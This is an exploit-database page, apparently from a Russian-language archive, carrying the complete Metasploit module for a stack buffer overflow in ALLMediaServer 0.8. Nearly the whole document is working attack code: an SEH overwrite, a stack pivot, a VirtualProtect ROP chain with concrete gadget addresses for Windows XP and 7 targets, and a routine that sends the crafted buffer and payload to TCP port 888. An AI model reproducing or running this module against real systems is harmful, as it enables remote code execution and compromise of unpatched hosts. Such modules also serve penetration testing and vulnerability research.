ALLMediaServer 0.8 Buffer Overflow Exploit

Свойства

Дата публикации:
15.07.2012
Цель:
ALLMediaServer 0.8
Тип воздействия:
Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

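class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Seh

    # Registers module metadata, the per-target layout constants and the
    # RPORT option (the module targets ALLMediaServer on TCP/888 by default).
    #
    # Per-target keys consumed by #exploit:
    #   Ret       - SEH handler: ADD ESP,6CC # POP # POP # POP # RET in the
    #               bundled avcodec DLL (spelled "avcoded" upstream). The same
    #               address is used on XP and 7 because the gadget lives in an
    #               application-shipped module, not a system DLL.
    #   OffsetRop - bytes of filler before the ROP chain (where ESP lands after
    #               the ADD ESP,6CC pivot).
    #   jmp       - displacement of the relative JMP that hops from the end of
    #               the ROP chain over the SEH record to the payload.
    #   Offset    - byte offset of the 8-byte SEH record (nSEH + SEH) in the
    #               buffer; the payload follows it immediately.
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'ALLMediaServer 0.8 Buffer Overflow',
            'Description'    => %q{
                This module exploits a stack buffer overflow in ALLMediaServer 0.8.
                The vulnerability is caused due to a boundary error within the
                handling of HTTP request.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'motaz reda <motazkhodair[at]gmail.com>',    # Original discovery
                    'modpr0be <tom[at]spentera.com>',    # Metasploit module
                    'juan vazquez' # More improvement
                ],
            'References'     =>
                [
                    [ 'EDB', '19625' ]
                ],
            'DefaultOptions' =>
                {
                    'ExitFunction' => 'process', #none/process/thread/seh
                },
            'Platform'       => 'win',
            'Payload'        =>
                {
                    'BadChars' => "",     # no bad chars declared; filler is raw rand_text
                    'Space' => 660,       # room after the SEH record on the target stack
                    'DisableNops' => true
                },

            'Targets'        =>
                [
                    [ 'ALLMediaServer 0.8 / Windows XP SP3 - English',
                        {
                            'Ret'       =>    0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcodec-53.dll ("avcoded" upstream)
                            'OffsetRop' =>    696,
                            'jmp'       =>    264,
                            'Offset'    =>    1072
                        }
                    ],
                    [ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
                        {
                            'Ret'       =>    0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcodec-53.dll ("avcoded" upstream)
                            'OffsetRop' =>    332,
                            'jmp'       =>    628,
                            'Offset'    =>    1072
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Jul 04 2012',
            'DefaultTarget'  => 1))

        register_options([Opt::RPORT(888)], self.class)

    end

    # n copies of one random 32-bit value, for ROP slots whose contents do not
    # matter (e.g. a register that is popped and never used).
    def junk(n=1)
        [rand_text_alpha(4).unpack("L")[0]] * n
    end

    # n ROP NOPs (address of a bare RETN gadget) when rop is true, otherwise
    # n dwords of plain 0x90 NOP bytes for the post-VirtualProtect landing zone.
    def nops(rop=false, n=1)
        rop ? [0x665a0aa1] * n : [0x90909090] * n
    end

    # Assembles 32-bit x86 source into raw bytes with Metasm.
    def asm(code)
        Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string
    end

    # Builds and sends the overflow buffer. Layout, with per-target offsets:
    #   [0, OffsetRop)        random filler
    #   [OffsetRop, ...)      ROP chain, reached via the ADD ESP,6CC pivot in Ret
    #   ...                   JMP $+jmp, skipping the SEH record into the payload
    #   ...                   random filler up to Offset
    #   [Offset, Offset+8)    SEH record: nSEH + SEH handler (target.ret)
    #   [Offset+8, ...)       encoded payload (at most Space bytes)
    #
    # Raises RuntimeError if the ROP chain plus JMP would run past Offset; the
    # previous code then appended no filler and silently shifted the SEH record
    # and payload, producing a confusing crash instead of a clear error.
    def exploit
        # VirtualProtect chain generated with mona.py. PUSHAD pushes
        # EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI, so after PUSHAD # RETN the stack reads:
        #   EDI -> ROP NOP (RETN)              returns into the next slot
        #   ESI -> VirtualProtect()            called with the frame below
        #   EBP -> "call esp"                  VirtualProtect's return address
        #   ESP -> lpAddress (current stack)
        #   EBX -> dwSize       = 0x600
        #   EDX -> flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE)
        #   ECX -> lpflOldProtect (any writable address)
        #   EAX -> NOP dword, executed once "call esp" lands here
        rop = [
            nops(true, 12),  # ROP NOP sled
            0x65f6faa7,      # POP EAX # RETN
            0x671ee4e0,      # ptr to &VirtualProtect()  (IAT slot; build-specific)
            0x6ac1ccb4,      # MOV EAX,DWORD PTR DS:[EAX] # RETN
            0x667ceedf,      # PUSH EAX # POP ESI # POP EDI # RETN
            junk,            # consumed by the POP EDI above
            0x65f5f09d,      # POP EBP # RETN
            0x65f9830d,      # & call esp  -> EBP
            0x6ac1c1d5,      # POP EBX # RETN
            0x00000600,      # dwSize 0x600 -> EBX
            0x6672a1e2,      # POP EDX # RETN
            0x00000040,      # flNewProtect 0x40 -> EDX
            0x665a09df,      # POP ECX # RETN
            0x6ad58a3d,      # &Writable location -> ECX (lpflOldProtect)
            0x6ac7a771,      # POP EDI # RETN
            nops(true),      # RETN (ROP NOP) -> EDI
            0x6682f9f4,      # POP EAX # RETN
            nops,            # NOP dword -> EAX
            0x663dcbd2       # PUSHAD # RETN
        ].flatten.pack("V*")

        # Assemble the whole buffer before touching the network so a layout
        # problem fails fast without opening a connection.
        buffer = rand_text(target['OffsetRop'])    # filler up to the pivot target
        buffer << rop
        buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # hop over the SEH record to the payload

        filler_len = target['Offset'] - buffer.length
        if filler_len < 0
            raise RuntimeError, "ROP chain and jmp (#{buffer.length} bytes) overrun the SEH offset (#{target['Offset']}) for #{target.name}"
        end
        buffer << rand_text(filler_len)
        buffer << generate_seh_record(target.ret)
        buffer << payload.encoded

        connect

        print_status("Sending payload to ALLMediaServer on #{target.name}...")
        sock.put(buffer)

        disconnect

    end
end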
